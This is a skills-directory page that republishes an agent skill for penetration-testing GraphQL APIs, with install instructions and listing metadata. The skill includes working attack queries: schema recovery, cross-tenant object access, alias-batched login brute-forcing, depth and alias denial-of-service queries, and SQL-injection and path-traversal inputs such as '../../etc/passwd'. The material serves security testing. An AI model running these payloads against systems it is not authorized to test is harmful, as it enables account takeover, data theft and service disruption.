API Designer
Jeffallan/claude-skills
Designs REST and GraphQL APIs from resource modeling to an OpenAPI 3.1 contract, with versioning, pagination and RFC 7807 error handling.
Test GraphQL APIs — introspection and schema recovery when introspection is disabled, field suggestion abuse, batching and alias-based rate limit bypass, query depth and complexity denial of…
$ npx skills add trilwu/secskills --skill attacking-graphql -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install trilwu/secskills attacking-graphql --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .claude/skills/attacking-graphql && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .claude/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphqlType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add trilwu/secskills --skill attacking-graphql -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install trilwu/secskills attacking-graphql --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .agents/skills/attacking-graphql && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .agents/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add trilwu/secskills --skill attacking-graphql -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install trilwu/secskills attacking-graphql --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .cursor/skills/attacking-graphql && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .cursor/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/trilwu/secskills.git --path secskills-offense/skills/attacking-graphql--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add trilwu/secskills --skill attacking-graphql -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install trilwu/secskills attacking-graphql --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .gemini/skills/attacking-graphql && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .gemini/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install trilwu/secskills attacking-graphqlInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add trilwu/secskills --skill attacking-graphql -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .github/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .github/skills/attacking-graphql && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .github/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add trilwu/secskills --skill attacking-graphql -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install trilwu/secskills attacking-graphql --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/secskills-offense/skills/attacking-graphql .opencode/skills/attacking-graphql && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "attacking-graphql" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/attacking-graphql into .opencode/skills/attacking-graphql/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "attacking-graphql", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
attacking-graphqlTest GraphQL APIs — introspection and schema recovery when introspection is disabled, field suggestion abuse, batching and alias-based rate limit bypass, query depth and complexity denial of…
Attacking Graphql is an agent skill from trilwu/secskills. Test GraphQL APIs — introspection and schema recovery when introspection is disabled, field suggestion abuse, batching and alias-based rate limit bypass, query depth and complexity denial of service, authorization gaps per field and per resolver, and mutation abuse. Use when a target exposes /graphql, /v1/graphql, or /api/graphql, when requests contain a query or mutation body, or when responses carry a data and errors envelope.
Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Backend & APIs, covering GraphQL. It works with GraphQL. The repository describes itself as: Transform Claude Code into your personal security engineer. The licence is MIT.
Read from SKILL.md and the folder at commit ca53957. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curljqpython3From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
attack.mitre.orgFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Attacking Graphql loads about 2.3k tokens when it runs. Until then it costs about 113 tokens; SKILL.md has 846 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from trilwu/secskills at commit ca53957, republished under its MIT licence (© trilwu). 846 words, ~2,282 tokens.
.claude/skills/attacking-graphql/SKILL.md (or your agent's skills folder).GraphQL moves authorization from routes to resolvers, and most teams do not
move their access control with it. The REST habit of protecting /admin/* has
no equivalent when every operation arrives at one endpoint — so the recurring
finding is not an exotic GraphQL bug, it is an ordinary authorization failure
on a field nobody thought to guard.
/graphql, /graphiql, /v1/graphql, /api/graphqlquery, mutation, subscription, or operationName{"data": ..., "errors": [...]} envelopetesting-apis or attacking-grpc-protobufauditing-code-for-vulnerabilities; read the
resolvers, which is faster and more completetesting-web-applications# Standard introspection
curl -s https://target/graphql -H 'Content-Type: application/json' \
-d '{"query":"query{__schema{types{name fields{name args{name type{name}}}}}}"}' | jq .
# Tooling that renders it usefully
graphql-cop -t https://target/graphql
clairvoyance https://target/graphql -o schema.json # works WITHOUT introspection
graphw00f -t https://target/graphql # fingerprint the engineWhen introspection is disabled, the schema is usually still recoverable.
Most engines return "did you mean" suggestions on a misspelled field, which
leaks valid names one character class at a time. clairvoyance automates
exactly this.
# Field suggestion leak — the response names fields you did not know
curl -s https://target/graphql -d '{"query":"{ userr { id } }"}' -H 'Content-Type: application/json'
# → "Cannot query field \"userr\" on type \"Query\". Did you mean \"user\"?"Other schema sources: the client bundle (queries are usually inlined in the JS),
a .graphql file served by mistake, persisted-query manifests, and Apollo
Studio or similar tooling left public.
Fingerprint the engine — behaviour differs materially. Apollo, graphql-js,
Hasura, graphene, gqlgen, and HotChocolate each have distinct defaults for
batching, suggestions, depth limits, and error verbosity. graphw00f names it.
Test authorization per field and per resolver, not per endpoint. A schema
where user(id:) is guarded but user { organization { members { email } } }
is not is the standard finding.
# 1. Object-level: request another tenant's or user's object by ID
query { user(id: "other-user-id") { id email phone } }
# 2. Field-level: the object is yours, but a field should not be exposed
query { me { id email passwordHash internalNotes stripeCustomerId } }
# 3. Traversal: reach a protected object through an unguarded edge
query { post(id: 1) { author { email resetToken orders { total } } } }
# 4. Mutations: the usual suspects, called directly
mutation { updateUser(id: "other", input: {role: ADMIN}) { id role } }
mutation { deleteAccount(id: "other") { success } }Traversal through relationships is the highest-yield test. Developers guard the entry points they think about; nested edges inherit whatever the parent resolver allowed, and often that is nothing. Enumerate the schema's edges and walk from any object you legitimately own toward objects you do not.
Repeat every test at each privilege level you have: anonymous, low-privilege user, and a second tenant's user.
One HTTP request can carry many operations, which defeats per-request rate limiting — the classic 2FA and password brute-force bypass.
# Aliases: N attempts, one request
{
a1: login(user:"admin", pass:"1234") { token }
a2: login(user:"admin", pass:"1235") { token }
a3: login(user:"admin", pass:"1236") { token }
}[ {"query":"{ user(id:1){email} }"},
{"query":"{ user(id:2){email} }"},
{"query":"{ user(id:3){email} }"} ]Array batching is supported by default in several engines. Test both forms; they are often limited differently, and rate limiting applied at the HTTP layer sees one request either way.
# Depth: cyclic relationships nested repeatedly
{ user { posts { author { posts { author { posts { id } } } } } } }
# Breadth: aliases multiply one expensive resolver
{ a: search(q:"x"){id} b: search(q:"x"){id} c: search(q:"x"){id} ... }
# Field duplication amplifies without depth
{ user { id id id id id id ... } }Check for: a depth limit, a complexity/cost limit, a timeout, a node limit on pagination, and whether the engine batches N+1 resolver calls or issues one query per node. Prove the risk with a small, bounded query — measure the response-time gradient across depths rather than actually exhausting the service. A single 8-level query that takes 30 seconds when a 3-level one takes 30 milliseconds is the evidence; you do not need to take the API down.
Resolvers reach databases the same as any other handler, so the classic classes apply — with the twist that arguments are strongly typed, which people mistake for validation.
{ user(filter: "1' OR '1'='1") { id } } # SQL/NoSQL injection
{ users(where: {email: {_ilike: "%"}}) { email } } # Hasura-style filter abuse
{ file(path: "../../etc/passwd") { contents } } # traversalHasura and similar auto-generated APIs deserve specific attention: they expose
rich where filters directly to the client, so a permissive row-level-security
configuration means the filter language itself becomes the vulnerability.
GET or form-encoded queries. If the endpoint accepts
?query=mutation{...} or application/x-www-form-urlencoded, mutations are
reachable cross-origin without a preflight.String still reaches the database.<!-- attack:start -->
Generated from secskills-core/ttp-index.json — edit that file, then run
python3 scripts/sync_attack.py --write. Re-verify IDs against the
current ATT&CK release before citing them in a report.
Initial Access (TA0001)
testing-web-applications, testing-apis, enumerating-network-services, attacking-grpc-protobuf, exploiting-deserialization, exploiting-ssrf, exploiting-xxeDetection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.
<!-- attack:end -->
testing-apis — the general API methodology this specializesauditing-code-for-vulnerabilities — resolver-level review when source existstesting-web-applications — the app around the endpointreporting-security-findings — severity for authorization findings© trilwu, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in secskills-offense/skills/attacking-graphql of trilwu/secskills.
Open the folder on GitHubat commit ca53957
Attacking Graphql next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Attacking Graphql this skilltrilwu/secskills | 156 | — | ~2.3k | Automated safety check: Pass | MIT | |
| API DesignerJeffallan/claude-skills | 12k | 2 repos | ~2k | Automated safety check: Pass | MIT | |
| Nodejs Backend Patternsever-works/ever-works | 158 | 18 repos | ~4k | Automated safety check: Pass | AGPL-3.0 | |
| GraphQL Operations with CodegenChrisWiles/claude-code-showcase | 6.1k | 3 repos | ~1.5k | Automated safety check: Pass | None | |
| API Design Principlesjh941213/my-cc-harness | 126 | 20 repos | ~3.4k | Automated safety check: Pass | None | |
| API And Interface Designdzhalaevd/Donatello | 135 | 9 repos | ~2.6k | Automated safety check: Pass | Apache-2.0 |
Jeffallan/claude-skills
Designs REST and GraphQL APIs from resource modeling to an OpenAPI 3.1 contract, with versioning, pagination and RFC 7807 error handling.
ever-works/ever-works
Build production-ready Node.js backend services with Express/Fastify, implementing middleware patterns, error handling, authentication, database integration, and API design best practices.
ChrisWiles/claude-code-showcase
Sets the rules for writing GraphQL queries and mutations in .gql files, running codegen, and using generated Apollo hooks with proper error and loading handling.
jh941213/my-cc-harness
REST 및 GraphQL API 설계 원칙 가이드. An agent skill from jh941213/my-cc-harness.
dzhalaevd/Donatello
Guides stable API and interface design. An agent skill from dzhalaevd/Donatello.
CloudAI-X/claude-workflow-v2
Designs REST and GraphQL APIs including endpoints, error handling, versioning, and documentation.
trilwu/secskills
Audit source code for exploitable vulnerabilities using threat-model-driven review, taint tracing, invariant checking, and variant analysis.
trilwu/secskills
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access.
trilwu/secskills
Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…
trilwu/secskills
Reverse engineer compiled binaries, firmware, and mobile app packages using triage, static disassembly, decompilation, and dynamic instrumentation.
trilwu/secskills
Reverse engineer Go binaries by recovering function names and types from pclntab and moduledata using GoReSym, redress, and IDA/Ghidra Go plugins, and by reading Go's non-standard calling…
trilwu/secskills
Analyze iOS applications at the binary level — decrypting FairPlay-protected IPAs with frida-ios-dump or bagbak, inspecting Mach-O load commands, recovering Objective-C headers with class-dump, and…
Works with
Categories
Test GraphQL APIs — introspection and schema recovery when introspection is disabled, field suggestion abuse, batching and alias-based rate limit bypass, query depth and complexity denial of…. Attacking Graphql is an agent skill from trilwu/secskills. Test GraphQL APIs — introspection and schema recovery when introspection is disabled, field suggestion abuse, batching and alias-based rate limit bypass, query depth and complexity denial of service, authorization gaps per field and per resolver, and mutation abuse.
Attacking Graphql fits situations like: A target exposes /graphql; requests contain a query; responses carry a data and errors envelope.
Run `npx skills add trilwu/secskills --skill attacking-graphql -a claude-code`. Or copy the skill folder (secskills-offense/skills/attacking-graphql in trilwu/secskills) into .claude/skills/attacking-graphql in your project. Claude Code loads it when a task matches its description.
Run `npx skills add trilwu/secskills --skill attacking-graphql -a codex`. Or copy the skill folder (secskills-offense/skills/attacking-graphql in trilwu/secskills) into .agents/skills/attacking-graphql in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add trilwu/secskills --skill attacking-graphql -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/attacking-graphql, .gemini/skills/attacking-graphql, .github/skills/attacking-graphql and .opencode/skills/attacking-graphql in your project.
Going by SKILL.md and its folder, Attacking Graphql needs the command-line tools its instructions call (curl, jq and python3). Our summary lists: Python 3.
SKILL.md names 1 domain. As links in the text: attack.mitre.org. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Attacking Graphql is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.3k tokens (SKILL.md is roughly 9.1k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Attacking Graphql: API Designer (Jeffallan/claude-skills, 12k stars), Nodejs Backend Patterns (ever-works/ever-works, 158 stars), GraphQL Operations with Codegen (ChrisWiles/claude-code-showcase, 6.1k stars) and API Design Principles (jh941213/my-cc-harness, 126 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
trilwu (a GitHub user) maintains it in trilwu/secskills, which has 156 GitHub stars. The repository holds 50 skills in this directory. The repository was last updated on September 4, 2026.
Source: trilwu/secskills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.